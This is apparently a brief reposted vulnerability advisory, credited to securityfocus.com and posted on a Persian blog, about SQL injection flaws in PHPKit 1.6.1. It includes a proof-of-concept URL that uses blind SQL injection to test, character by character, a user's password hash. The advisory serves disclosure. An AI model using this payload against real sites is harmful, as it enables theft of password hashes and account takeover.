SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1
SQL Injection in include.php?path=login/member.php
The parameters usernick and letters are vulnerable to SQL Injections.
POC:
/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(use
r_pw,1,1)='8'/*
This will show the user "phuket" if the first character of his password
hash is '8'.
SQL Injection in include.php?path=login/imcenter.php
منبع : securityfocus.com
+ نوشته شده در چهارشنبه بیست و دوم شهریور 1385ساعت 0:57 توسط
|